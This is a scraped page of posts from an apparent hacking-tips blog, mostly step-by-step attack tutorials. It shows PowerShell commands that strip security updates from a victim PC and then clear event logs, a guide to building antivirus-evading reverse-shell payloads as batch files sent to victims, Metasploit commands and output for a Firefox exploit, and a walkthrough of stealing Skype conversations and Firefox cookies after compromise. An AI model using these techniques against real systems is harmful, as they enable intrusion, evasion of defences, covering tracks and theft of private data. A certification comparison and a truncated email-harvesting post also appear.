title="nishang-5" width="320" /></a></div><br /><br />(3)Other good module is removing update from victim`s p.c.<br /><br />To all updates from the target. <br />powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Remove-Update.ps1 All <br /><br />TO remove all security updates from the target. <br />powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Remove-Update.ps1 Security <br /><br />To remove specific update from target. <br />powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Remove-Update.ps1 KB2761226<br /><br />(4)Speaks:-This powershell script speak text in victim`s pc which we write in our shell.<br /><br />powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Speak.ps1 'Hello sir; you have been hacked' <br /><br />These are  basic module ; there are also advanced module in nishnag.If you need more information than visit this <a href="http://labofapenetrationtester.blogspot.com/" target="_blank">link</a>.<br /><br />After using powershell script remove folder & clear event.<br />cd C:\\Users/victim <br />RD /s /q 123 <br />exit <br />clearev </div>

Post exploitation using Nishang.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation...

+ Read more »

Bypass AV using powershell method using batch file.

<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"></div>In penetration testing first step is how we can bypass AV & make our payload FUD. Previously we saw that we can bypass AV using <a href="http://tipstrickshack.blogspot.com/2013/08/bypass-av-using-veil-in-backtrack.html" target="_blank">Veil</a>.At that time we used python module.In veil there are four types of payload.C,C#,powershell and python. Today we use powershell module.<br /><br />If you don`t aware about powershell ; then you can google it.It`s windows based scripting language like bash in linux.Most of AV cannot detect it.We use SET powershell module to bypass AV; you can also use <a href="http://tipstrickshack.blogspot.com/2013/08/bypass-av-using-veil-in-backtrack.html" target="_blank">veil module</a>.<br /><br />cd  /pentest/exploits/set/<br />./setoolkit<br /><br />type 1 which is social engineering attack<br />After that type 10.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQGQomPgQFy-aBKpzJ6lKku7AydiWfSV6n9y89Wnkx5TDRNSWXUq3E2JrB_kW1ALmhtU1CQNKUoot-Nb6Rga0KupSTk406XAg4NEuLczpxv2iIucDny1anN-5af6NRfR2XFQcVl01kj_eK/s1600/Screenshot-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="powershell-module" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQGQomPgQFy-aBKpzJ6lKku7AydiWfSV6n9y89Wnkx5TDRNSWXUq3E2JrB_kW1ALmhtU1CQNKUoot-Nb6Rga0KupSTk406XAg4NEuLczpxv2iIucDny1anN-5af6NRfR2XFQcVl01kj_eK/s320/Screenshot-1.png" title="powershell-module" width="320" /></a></div><br />Then give your i.p. & port to connect reverse shell.<br /><br />Now in figure you can see that it has been generated & stored in to /root/.set/reports/powershell . And we also start metasploit listener.If victim paste our generated payload in cmd then we can get meterpreter shell. But i think it`s hard to tell someone to copy something & paste into cmd. So we will create batch file of our payload.<br /><br /><h3 style="text-align: left;">Create Batch file of our Payload.</h3><br />(1)open x86_powershell_injection.txt file from  /root/.set/reports/powershell.<br />(2)Add path of powershell in first line. For example your code is starting from powershell word just put C:\\windows/system32/windowspowershell/v1.0/ before it.<br />(3)If you want to hide text during execution put @echo off at start of script. <br />(4)copy all code from x86_powershell_injection.txt <br />(5)Create new file & paste code<br />(6)Save this file as .bat extension and send to victim<br /><br />As soon as he open file we can get shell. </div>

Bypass AV using powershell method using batch file.

In penetration testing first step is how we can bypass AV & make our payload FUD. Previously we saw that we can bypass AV using Veil .At...

+ Read more »

Exploit for Firefox 17 in Windows XP sp3

<div dir="ltr" style="text-align: left;" trbidi="on">Recently Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography.Now exploit is available in metasploit. Use msfupdate to get it.<br /><br /><br />Exploit target:<br /><br />   Id  Name<br />   --  ----<br />   0   Firefox 17 & Firefox 21 / Windows XP SP3<br /><br /><br />msf > use exploit/windows/browser/mozilla_firefox_onreadystatechange<br /><br />msf exploit(mozilla_firefox_onreadystatechange) > set LHOST 180.215.222.190<br />LHOST => 180.215.222.190<br />msf exploit(mozilla_firefox_onreadystatechange) > set SRVHOST 180.215.222.190<br />SRVHOST => 180.215.222.190<br />msf exploit(mozilla_firefox_onreadystatechange) > set uripath /<br />uripath => /<br />msf exploit(mozilla_firefox_onreadystatechange) > set payload windows/meterpreter/reverse_tcp<br />payload => windows/meterpreter/reverse_tcp<br />msf exploit(mozilla_firefox_onreadystatechange) > run<br />[*] Exploit running as background job.<br /><br />[*] Started reverse handler on 180.215.222.190:4444 <br />[*] Using URL: http://180.215.222.190:8080/<br />[*] Server started.<br />msf exploit(mozilla_firefox_onreadystatechange) > <br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3A65z9eTiNDmWPxbZF0atsfcm_9W3ZzBbscNKxpOUspsNrBQXNvn7EOJVZ2ISPoxHBAgmwQb5pPeIH6uQC8lgSL81YOqY7iSrRSvK0BfDMp-xZXeoCY81KZe4VqyhE31kQmZLNBhOOPP4/s1600/firefox_exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="firefox-exploit" border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3A65z9eTiNDmWPxbZF0atsfcm_9W3ZzBbscNKxpOUspsNrBQXNvn7EOJVZ2ISPoxHBAgmwQb5pPeIH6uQC8lgSL81YOqY7iSrRSvK0BfDMp-xZXeoCY81KZe4VqyhE31kQmZLNBhOOPP4/s400/firefox_exploit.png" title="firefox-exploit" width="400" /></a></div><br /></div>

Exploit for Firefox 17 in Windows XP sp3

Recently Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography.No...

+ Read more »

Bypass AV using Veil In Backtrack.

<div dir="ltr" style="text-align: left;" trbidi="on">Today this blog complete exactly one year.Before one year i started journey in security world & still now it`s going well.Ok get to the point.Most of time it happened that our payload is detected by AV ;we can use encoder to encode our payload ;So it can not be detected by AV. Today we show how we can bypass AV using Veil. Veil is python based tool which create FUD payload.<br /><br />How to Download & use ?<br /><br />wget https://github.com/ChrisTruncer/Veil/archive/master.zip<br />unzip master.zip<br />cd Veil-master/setup<br />chmod +x setup.sh<br />./setup.sh<br /><br />It will download all required python package for generating payload.<br /><br />Veil is officially supported in Kali linux ; But it`s python based tool so we can use it in any os which is able to execute python script. I used it in Backtrack 5.We have to make some change in generated veil.py file to get working in backtrack.<br />Open directory of veil & go to config and open veil.py.(In latest version of veil , open /etc/veil/settings.py) If you installed metasploit from binary package then Change  line of metasploit path to /opt/metasploit/apps/pro/msf3/ and save it.<br /><br />Go to veil direcory & run<br />./Veil.py<br /><br /><div class="separator" style="clear: both; text-align: center;">  <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs7hGvUKM4uOAKoz_KNm3YJTDUng-ObFInaXG0n3NKC0aPDz3BiRp9NP6uKFEfUfxyEKdB9m7c1G33PlPPsOwTh8NxgbFEYFwWKKdFIBcB2f1cUKTAYnJsz49M6TbWnQvnZJkJttMmvoQ7/s1600/veil.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AV-bypass-using-veil" border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs7hGvUKM4uOAKoz_KNm3YJTDUng-ObFInaXG0n3NKC0aPDz3BiRp9NP6uKFEfUfxyEKdB9m7c1G33PlPPsOwTh8NxgbFEYFwWKKdFIBcB2f1cUKTAYnJsz49M6TbWnQvnZJkJttMmvoQ7/s400/veil.png" title="AV-bypass-using-veil-1" width="400" /> </a></div><div class="separator" style="clear: both; text-align: center;"></div><a name='more'></a><br /><div class="separator" style="clear: both; text-align: left;">Now type list & you can see available payload. </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZwABDiScV-vRkMg15oqujsyTki6mLpIqixx2-PyLKOuxkoLjNHJSirupob7Vv1fxFGx_nUytXE6ooTJF7qo8Ab4LOd8_X7pg8yUTuOfOn4sYbNlrNYp2sH2kIl9RGQHpoUhOsHMzRFAux/s1600/veil-1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AV-bypass-using-veil" border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZwABDiScV-vRkMg15oqujsyTki6mLpIqixx2-PyLKOuxkoLjNHJSirupob7Vv1fxFGx_nUytXE6ooTJF7qo8Ab4LOd8_X7pg8yUTuOfOn4sYbNlrNYp2sH2kIl9RGQHpoUhOsHMzRFAux/s400/veil-1.jpeg" title="AV-bypass-using-veil-2" width="398" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">Select payload. </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUhF4pfbS_i9qRMcD7oM9miTF5RKNBBcW2BPf15oXIXzg03IpZdSgquOMyT3dNJiBWuDE8_rS7ES3mng-dXqQRIFygEa9nGRWm48WKAVwZVmgZotTnkyZfjk4qcsHZUqSB_3eeGgrATSRA/s1600/veil-2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AV-bypass-using-veil" border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUhF4pfbS_i9qRMcD7oM9miTF5RKNBBcW2BPf15oXIXzg03IpZdSgquOMyT3dNJiBWuDE8_rS7ES3mng-dXqQRIFygEa9nGRWm48WKAVwZVmgZotTnkyZfjk4qcsHZUqSB_3eeGgrATSRA/s400/veil-2.jpeg" title="AV-bypass-using-veil-3" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;">type generate.</div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuEYF08jErZx4UYKex_4Jis-HgJXE79HQxy6ECvoSyg5pE1LsV4zrGxTSpNWEHP64XXfjl__FKlOOoHnTZ829YKxR6L8b8qMzTjr24Xt8R_8Hy7nYt10fXUcf7_J8m98eFYoG0yJ5_bJ6V/s1600/veil-3.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AV-bypass-using-veil" border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuEYF08jErZx4UYKex_4Jis-HgJXE79HQxy6ECvoSyg5pE1LsV4zrGxTSpNWEHP64XXfjl__FKlOOoHnTZ829YKxR6L8b8qMzTjr24Xt8R_8Hy7nYt10fXUcf7_J8m98eFYoG0yJ5_bJ6V/s400/veil-3.jpeg" title="AV-bypass-using-veil-4" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX8EefDGhXH6nV9md2ljXWOrKi9ATubSNIHxcX9g7zOo93N4l2GW7Wsbu0byIM7ISLrQMu_ABaawx-nFPDhmCCaScNew4-e-D3MtQT5lAWZq_H7sQZr3Y98N_G8zgfvg6HFOB04-XR2s2d/s1600/veil-4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AV-bypass-using-veil" border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX8EefDGhXH6nV9md2ljXWOrKi9ATubSNIHxcX9g7zOo93N4l2GW7Wsbu0byIM7ISLrQMu_ABaawx-nFPDhmCCaScNew4-e-D3MtQT5lAWZq_H7sQZr3Y98N_G8zgfvg6HFOB04-XR2s2d/s400/veil-4.jpeg" title="AV-bypass-using-veil-5" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNQuxg0LA6WVaO70vWbj2V3UXyxPbgKHBDwXAhM9eh6rx1_v-c_Rhy8RLOznY_yE-Yc12yKw9V0buNTY7gvYwVJizDLIRqmhdIm_opB2pA1iTdEa5FccYdzT3JuesSaNkt4538nNf4g8ua/s1600/veil-5.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AV-bypass-using-veil" border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNQuxg0LA6WVaO70vWbj2V3UXyxPbgKHBDwXAhM9eh6rx1_v-c_Rhy8RLOznY_yE-Yc12yKw9V0buNTY7gvYwVJizDLIRqmhdIm_opB2pA1iTdEa5FccYdzT3JuesSaNkt4538nNf4g8ua/s400/veil-5.jpeg" title="AV-bypass-using-veil-6" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;">After that payload has been generated & you have to start metasploit listner for that payload type following in terminal.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=444 E </div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj74TJm4nT-W53jJJQEdyprIAntfrOLtJTXJkIrmArqqNROaYciO5BpPXanO7_InqsQlgVzB7qqOgaLiEP7kAtzkbnfVPzxpSxILt7v3D_s482MrQ229WgHuRFnpARY1ENjx4MkqAePdI8I/s1600/veil-7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AV-bypass-using-veil" border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj74TJm4nT-W53jJJQEdyprIAntfrOLtJTXJkIrmArqqNROaYciO5BpPXanO7_InqsQlgVzB7qqOgaLiEP7kAtzkbnfVPzxpSxILt7v3D_s482MrQ229WgHuRFnpARY1ENjx4MkqAePdI8I/s400/veil-7.jpg" title="AV-bypass-using-veil-7" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">Now send file to victim. As soon as he open file you get admin access without triggering AV alert.Look at my AV update status.</div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHX8l_-fZyYmr-s0pTSDo5-MwViXtYUT50HJuiRg5ummNaS7DTMUOPSkbCyvBZlTYvf-ClUPX-4KlkQ6OB1mZ-pdmVgLDM_DpCcbA3XrMIbjU-w07_j2Lx-ekeax7zmSe2mNM3oZufpEFh/s1600/veil-6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AV-bypass-using-veil" border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHX8l_-fZyYmr-s0pTSDo5-MwViXtYUT50HJuiRg5ummNaS7DTMUOPSkbCyvBZlTYvf-ClUPX-4KlkQ6OB1mZ-pdmVgLDM_DpCcbA3XrMIbjU-w07_j2Lx-ekeax7zmSe2mNM3oZufpEFh/s400/veil-6.jpg" title="AV-bypass-using-veil-8" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQNMul-zDn8axCUsHM4Nxd3tAmuxkJDnI5xsMUAEV10968U6sC0dalp5bmQyapdHjGc9SRcxRxFxB_XJMCHM7gRAovWKUtj9ixKUAYdWCNjI1dbfAPqVLKN2oRhWMH8D-QQB0oshTTdv7/s1600/14.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AV-bypass-using-veil" border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQNMul-zDn8axCUsHM4Nxd3tAmuxkJDnI5xsMUAEV10968U6sC0dalp5bmQyapdHjGc9SRcxRxFxB_XJMCHM7gRAovWKUtj9ixKUAYdWCNjI1dbfAPqVLKN2oRhWMH8D-QQB0oshTTdv7/s400/14.jpg" title="AV-bypass-using-veil-9" width="392" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div> As you can see in bottom of panel that AV is activate & it`s updated  ; still we can bypass AV & get meterpreter seesion.<br /><br /> [!] And don't submit samples to any online scanner! ;)<br />It`s author request. </div>

Bypass AV using Veil In Backtrack.

Today this blog complete exactly one year.Before one year i started journey in security world & still now it`s going well.Ok get to the ...

+ Read more »

Extract skype & firefox data after exploitation.

<div dir="ltr" style="text-align: left;" trbidi="on">Today we will see how can we extract skype username ; contacts details ;conversation;file transfer & also firefox history;cookies;google search from victim computer.<br /><br />First of all it`s post  exploitation, So i don`t go deep in How to hack remote P.C.. if you want to learn than click <a href="http://tipstrickshack.blogspot.com/search/label/metasploit/" target="_blank">here</a> & read <a href="http://tipstrickshack.blogspot.com/search/label/metasploit/" target="_blank">metasploit</a> section of blog.So you have to hack remote computer using <a href="http://tipstrickshack.blogspot.com/search/label/metasploit/" target="_blank">metasploit</a>.<br /><br /> I create simple payload ; encoded it so antivirus can not detect it.<br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhalXJ2s17KhLqZAbQb-wTW_DdI9r8mjwSJM1qU1RbG5u9L3ibhdJh7aCFwAdocIuWAPOY1T5JcV_CjnolawJ1_2sGDGfTyOLqmVXgSVFa5xgCT7kSCJN4_lCOyZ97MRimg1T1_gFH9kBZl/s1600/Screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="msfcli" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhalXJ2s17KhLqZAbQb-wTW_DdI9r8mjwSJM1qU1RbG5u9L3ibhdJh7aCFwAdocIuWAPOY1T5JcV_CjnolawJ1_2sGDGfTyOLqmVXgSVFa5xgCT7kSCJN4_lCOyZ97MRimg1T1_gFH9kBZl/s200/Screenshot.png" title="msfcli" width="200" /></a> </div><br />And then send link to victim , as soon as he download payload and execute it we get meterpreter shell. <br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUEnkJJEIzuMNzLx3hIE-glHACcHf-bunKCQgU_GRICroiP8f8hbjiH55Dn6prQSwvtGC6wh3pOVYf94mn9Vf7_85yOxLzYtErTQaHVvnXtZULScZ0m__S6GWf69W1lJPBp3sr0ji4WSOc/s1600/Screenshot-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="meterpreter" border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUEnkJJEIzuMNzLx3hIE-glHACcHf-bunKCQgU_GRICroiP8f8hbjiH55Dn6prQSwvtGC6wh3pOVYf94mn9Vf7_85yOxLzYtErTQaHVvnXtZULScZ0m__S6GWf69W1lJPBp3sr0ji4WSOc/s320/Screenshot-1.png" title="msfconsole" width="320" /></a></div><br /><a name='more'></a><br />After getting shell we have to get admin access of victim computer ;so by running getsystem command we can get admin access of shell.<br /><br />Now skype , firefox ,chrome stores their database in sql format ; so we have to download their database to our system.According to O.S. location of database is differ.We first download skype database its name is main.db.<br /><br />In windows C:\\Users\user_name\AppData\Roaming\Skype\skype_user_name <br />In mac     Users/user_name/Library//Application/Support/Skype/skype_user_name<br />In Linux   /root/.Skype/skype_user_name<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwRx0xSoaBHjKwF7mKdtsFOtU8ozfxtHxps9lq7LBJB8_gw4uj-OGpOFaeK3pdqVEtXMEL6HgVoY7-eH1J6RhMCMLHcd7EouZgSyVrEIq8bjw89uGqq1mjJQy9fxvOeeORokCUfKI7hdJL/s1600/Screenshot-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="extract_skype_data" border="0" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwRx0xSoaBHjKwF7mKdtsFOtU8ozfxtHxps9lq7LBJB8_gw4uj-OGpOFaeK3pdqVEtXMEL6HgVoY7-eH1J6RhMCMLHcd7EouZgSyVrEIq8bjw89uGqq1mjJQy9fxvOeeORokCUfKI7hdJL/s320/Screenshot-2.png" title="extract_skype_data" width="320" /></a></div><br />So we download database & saved to root folder.<br /><br /><br />Now we download firefox database folder which contain  cookies ;history ;search history ;download history.In below image you can show directory of database for firefox.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpaZmac2-LidQDhIiXl9qHwD0OQxG4D5gLiyRZgNM9YqR5tv4j9sbxWhfP6TCBcuaywlNwXcT3OD8o8soS_jPy4ihLLi0QAqxv0SPQGrhagCnG0BRcLgSmKQj55HVDOnZpBgTK7Q_iaDQ_/s1600/Screenshot-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="extract-firefox data" border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpaZmac2-LidQDhIiXl9qHwD0OQxG4D5gLiyRZgNM9YqR5tv4j9sbxWhfP6TCBcuaywlNwXcT3OD8o8soS_jPy4ihLLi0QAqxv0SPQGrhagCnG0BRcLgSmKQj55HVDOnZpBgTK7Q_iaDQ_/s320/Screenshot-3.png" title="extract-firefox data" width="320" /></a></div> After getting database clear event ; close sessions if you don`t want any other post exploitation.<br /><br />Now we have database we have to extract data from it ; so if you know sqllite you can extract data manually but it`s very hard working process to extract data one by one.so we create script which extract data from database.<br /><br />Extract Data from skype database:-<br /><br /><a href="http://pentesterscript.wordpress.com/2013/08/07/extract-contacts-call-log-message-from-skype-database/" target="_blank">Here</a> is simple script to extract data from skype.Visit following link for downloading script.<br />http://pentesterscript.wordpress.com/2013/08/07/extract-contacts-call-log-message-from-skype-database/<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwX41wsZwl6aImS058DpIdfbrsZSyUI0VrI1SLUYsVRN8HNXaH-_I4bp_9_YQKhzaz6cNB-9M0MCS4iuj2evH731eizPiKcAQYakpGAE-aNdXaT7lvY7bUXXAy-62aDX7PT4tV3yAohLIL/s1600/Screensot-2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="skype-data" border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwX41wsZwl6aImS058DpIdfbrsZSyUI0VrI1SLUYsVRN8HNXaH-_I4bp_9_YQKhzaz6cNB-9M0MCS4iuj2evH731eizPiKcAQYakpGAE-aNdXaT7lvY7bUXXAy-62aDX7PT4tV3yAohLIL/s320/Screensot-2.jpeg" title="skype-data" width="320" /></a></div><br /><br /><br />Extract Data from firefox:-<br /><a href="http://pentesterscript.wordpress.com/2013/08/07/extract-data-from-firefox-database/" target="_blank">Here</a> is simple script to extract data from firefox.Visit following link for downloading script.<br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJRYgMei1YqjDFyolZoMQW5xe1wa0SxcxOg1ETpg9kNrpkNNCiZFHWscWLbPEmfa0CVyb1SnyiuVFVG4XhXhFOToV7asIKE2Xv0qNGuX0BMUcdUuLknsHXpJQ0b_DAeCEHNyCOZb-pJeN4/s1600/sc.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="extract-firefox" border="0" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJRYgMei1YqjDFyolZoMQW5xe1wa0SxcxOg1ETpg9kNrpkNNCiZFHWscWLbPEmfa0CVyb1SnyiuVFVG4XhXhFOToV7asIKE2Xv0qNGuX0BMUcdUuLknsHXpJQ0b_DAeCEHNyCOZb-pJeN4/s320/sc.jpeg" title="extract-firefox" width="320" /></a></div>You can also create script for  download database from chrome . Or if you need it then comment here ; i will send you.<br /><br /></div>

Extract skype & firefox data after exploitation.

Today we will see how can we extract skype username ; contacts details ;conversation;file transfer & also firefox history;cookies;google...

+ Read more »

Why CPTE IS Better Than CEH?

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMtRIUXlSoyTMQBDv75epkZFXlboE_cC_IUxZ6bEaRbY6Df3BX6HUqoXp6zW-CkCgVx6Hsmr9JqQXRLUZVYnlRHt_a9O6zAf74R7IqkE7E4Wv3idn3lwnZIjrPqycfV-PTcmKFmYzBjo0/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMtRIUXlSoyTMQBDv75epkZFXlboE_cC_IUxZ6bEaRbY6Df3BX6HUqoXp6zW-CkCgVx6Hsmr9JqQXRLUZVYnlRHt_a9O6zAf74R7IqkE7E4Wv3idn3lwnZIjrPqycfV-PTcmKFmYzBjo0/s1600/images.jpg" /></a></div>In today’s information age, the security of data and technical assets from “<b>Hackers</b>” has become the top priority for every organization. For this purpose organizations hunt for people who can actually provide Information security to them. These guys (or girls in some cases) are generally referred to as “<b>Security professionals</b>”. We can imagine them as knights of the cyber space.<br /><br />If we look a few decades back when cyber space just considered a myth, when most computers were noisy large mainframes and when the word “Hack” was just for train modelling (this was not a joke), back then there was no concept of cyber security. But after some nasty security breaches governments put their heads together upon this issue and Cyber security departments and organizations were formed to train such people.<br /><a name='more'></a><br />Nowadays we see two certifications that are racing each other, one is <b>CPTE</b> (Certified Penetration testing engineer) from mile2 and the other is CEH (Certified Ethical Hacker) from EC-Council. But if we look at the fact I would say CPTE has lead in this one and this is not a hunch.<br />Some interesting facts that prove that CPTE is better than CEH<br /><h4>Facts</h4><ul style="text-align: left;"><li>If we analyze the course outline and the material of both courses it is clearly seen that in CEH candidate are only taught how to use the tools required for the job and are not provided with knowledge otherwise.</li></ul><ul style="text-align: left;"><li>While CPTE candidates are provided with in-depth knowledge so that they may be able counter security issues more efficiently. </li></ul><ul style="text-align: left;"><li>CPTE has regular updates and modifications according to the fashion in security. While CEH is only updated entirely once in several years. </li></ul><ul style="text-align: left;"><li>Now if we look at the other aspects CPTE also enhances the business skills needed to identify protection opportunities and optimize security controls according to the business needs while CEH we only focuses the technical side of Information security and that too up to the extent of teaching how to use tools.</li></ul><ul style="text-align: left;"><li>Now let us look at the economic factors that make CPTE better than CEH. The exam cost of CPTE is 250$ with no expiration of the course it means that if a course more advanced then CPTE is produced in the future then CPTE will remain as It is and the certifications of the candidates will whatsoever not be cancelled, Now the cost of CEH is 500$ with the possibility that the course will expire in 2 years when it is updated with a newer version and CEHv7 (CEH currently in action) will have to be re-done otherwise certifications will be cancelled. Now that might not sound like a good news to most of us who were thinking of doing CEH (because it is not a good news).</li></ul><div>Rafay's Opinion: "</div><ul style="text-align: left;"><li><i>CEH in my opinion is the catalog of tools with lots of outdated content, imaging a certification talking about null session that haven't worked after windows 2000. So the content is quite outdated.</i></li></ul><ul style="text-align: left;"><li><i>In a penetration test or any kind of security engagement reporting in my opinion is the most essential part, the more you are good at reporting the more customer satisfaction you have, which is our final goal to build good relationships with customers. CEH does not talks about any of the reporting methodology, whereas CPTE and other certs like GPEN, OSCP talk about reporting methodology. </i> "</li></ul><iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/oYdn7HjhVwE?feature=player_embedded" width="577"></iframe> There you have it in-depth knowledge, more comprehensive training, accreditation by NSA what more could a person ask for in 250$. I know I am going for CPTE, wait….. I already am a CPTE. I don’t know about you guys.<br /><br />Cheers<br /><h4>About The Author</h4>This article has been written by "<b>Shahmeer Amir</b>". Shahmeer is one of the developers of "Maadstrack". He is a<b> CPTE</b> and<b> CISSO</b> certified.</div>

Why CPTE IS Better Than CEH?

In today’s information age, the security of data and technical assets from “ Hackers ” has become the top priority for every organization. F...

+ Read more »

Extract email address from given domain.

<div dir="ltr" style="text-align: left;" trbidi="on">Yesterday i created simple script which extract email address from given Domain. We can gather email address from whois info; pgp key search ;domain name. With help of this script we can extract email address which are on the specified web page.In backtrack there is tool available which is uberharvester. It has many features ;  but for small website it takes too much time to extract information.But this script work fast for small website. Speed of script depends on loading time of website and number of web pages.<br /><br />Script working in two mode.<br /><br />(1)In first mode we have to supply sitemap of website, so script can crawl that webpage one by one & extract email address.<br />For example if your victim website is fakesite.com then go to http://xml-sitemaps.com/ & create sitemap & download it in text format and save it to same folder where script is located.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU8R_cE3xHS7bAa_nlHAYP7rq_NtOdI0aZktcGs8UtE9NUaeJi88cJKrCPS6xEhga4GIM6mx3rNFsI6vs8WR7O4zyRaEI4UaDrBetMuY7nyQ-3xdQbblbfYRG0qMfCKeivdfJli_yodmnq/s1600/Screenshot-1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img 